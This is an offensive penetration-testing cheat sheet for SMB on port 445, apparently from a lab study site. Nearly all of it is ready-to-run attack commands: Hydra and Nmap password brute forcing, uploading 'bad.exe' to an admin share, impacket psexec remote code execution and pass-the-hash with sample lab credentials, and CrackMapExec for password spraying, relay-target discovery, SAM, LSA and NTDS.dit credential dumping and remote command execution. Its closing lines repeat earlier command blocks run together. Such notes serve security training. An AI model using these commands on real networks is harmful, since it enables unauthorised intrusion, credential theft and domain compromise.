SMB - 445

SMB Bruteforcing

Hydra Command: Execute SMB brute forcing using username and password lists.
Nmap Command: Nmap script for SMB brute force using username and password files.

hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt -vV 172.19.19.70 smb
nmap -p445 172.25.30.4 --script smb-brute.nse --script-args userdb=/home/kali/wordlistcpent/usernames,passdb=/home/kali/wordlistcpent/passwords --script-args ssh-brute.timeout=4s

SMB Enumeration

nmap -p 445,138,139 --script=*smb*

# Connect to a share via SMB
smbclient \\\\IP\\c$ -U Administrator

# Extract interesting domain and computer info with Enum4linux
Enum4linux -a -u 'Administrator' -p 'iloveu'

# Share file via smbclient
smbclient -c 'put bad.exe' -U t1_leonard.summers -W ZA '//thisis.za.tryhackme.com/admin$' EZpass4ever

# list shares
smbclient -L 10.129.170.128 -U Administrator  

# NAVIGATE THROUGH UNPROTECTED C* SHARE  
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator 
 
# List shares without asking for a password - 
smbclient -N -L 10.0.0.43 

# Show all NetBIOS names and functions of the IP
Nbtstat -A IP

Impackets

# Use impacket for remote code execution through SMB
Python /usr/share/doc/python3-impacket/examples/psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Python /usr/share/doc/python3-impacket/examples/psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
impacket-psexec ECC.LOCALNET/administrator:'Pa$$w0rd123'@172.25.170.80

# Using PsExec.exe from Windows to have code execution via SMB
PsExec.exe \\172.25.170.110: cmd.exe

CrackMapExec

CrackMapExec (CME) can be used to enumerate SMB sessions, Active Directory group memberships, and SMB shares. Below are some typical usage examples:

1. Map network hosts

# Returns a list of live hosts in the network
cme smb 192.168.1.0/24

2. Generate Relay List

# Maps the network of live hosts and saves a list of hosts that don't require SMB signing
cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt

3. Enumerate shares and access

# Enumerates shares on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares

4. Enumerate active sessions

# Lists active sessions on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions

5. Enumerate disks

# Lists disks on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks

6. Enumerate logged on users

# Lists logged on users on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users

7. Enumerate domain users

# Lists domain users on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users

8. Enumerate users by bruteforcing RID

# Enumerates users by bruteforcing RID using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute

9. Enumerate domain groups

# Lists domain groups on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups

10. Enumerate local groups

# Lists local groups on the network using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups

11. Obtain domain password policy

# Retrieves the domain password policy using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol

12. Authentication with User/Password

# Attempts authentication using username and password
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'

13. Authentication with User/Hash

# Attempts authentication using username and NTLM hash
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'

14. Null Sessions

# Attempts authentication with null sessions
cme smb 192.168.1.0/24 -u '' -p ''

15. Using Username/Password Lists

# Uses lists of usernames and passwords for authentication attempts
cme smb 192.168.1.101 -u /path/to/users.txt -p /path/to/passwords.txt

16. Authentication with Local Auth

# Attempts local authentication using provided credentials
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth

17. Dump SAM hashes

# Dumps SAM hashes using methods from secretsdump.py
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

18. Dump LSA secrets

# Dumps LSA secrets using methods from secretsdump.py
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa

19. Dump NTDS.dit

# Dumps the NTDS.dit from target DC using methods from secretsdump.py
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds

20. Spidering Shares

# Spiders the C drive for files with 'txt' in the name
cme SMB <IP> -u USER -p PASSWORD --spider C\$ --pattern txt

21. Command Execution

# Executes commands on remote systems using specified method
cme smb 10.10.33.121 -u Administrator -p AAdmin\!23 -X '$PSVersionTable' --exec-method wmiexec

22. WMI Query Execution

# Issues the specified WMI query
cme smb 10.10.33.121 -u Administrator -p 'P@ssw0rd' --wmi "SELECT * FROM Win32_logicalDisk WHERE DeviceID = 'C:'"

23. WMI Query Execution in a Specific Namespace

# Issues a WMI query in the specified namespace
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --wmi-namespace 'root\\cimv2'

This command allows you to execute WMI queries within the root\\cimv2 namespace, which is commonly used for system management information. L

PreviousFTP - 21 NextRDP - 3389

Last updated 4 months ago

hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt -vV 172.19.19.70 smb nmap -p445 172.25.30.4 --script smb-brute.nse --script-args userdb=/home/kali/wordlistcpent/usernames,passdb=/home/kali/wordlistcpent/passwords --script-args ssh-brute.timeout=4s

# Connect to a share via SMB smbclient \\\\IP\\c$ -U Administrator # Extract interesting domain and computer info with Enum4linux Enum4linux -a -u 'Administrator' -p 'iloveu' # Share file via smbclient smbclient -c 'put bad.exe' -U t1_leonard.summers -W ZA '//thisis.za.tryhackme.com/admin$' EZpass4ever # list shares smbclient -L 10.129.170.128 -U Administrator # NAVIGATE THROUGH UNPROTECTED C* SHARE smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator # List shares without asking for a password - smbclient -N -L 10.0.0.43 # Show all NetBIOS names and functions of the IP Nbtstat -A IP

# Use impacket for remote code execution through SMB Python /usr/share/doc/python3-impacket/examples/psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100 Python /usr/share/doc/python3-impacket/examples/psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP impacket-psexec ECC.LOCALNET/administrator:'Pa$$w0rd123'@172.25.170.80 # Using PsExec.exe from Windows to have code execution via SMB PsExec.exe \\172.25.170.110: cmd.exe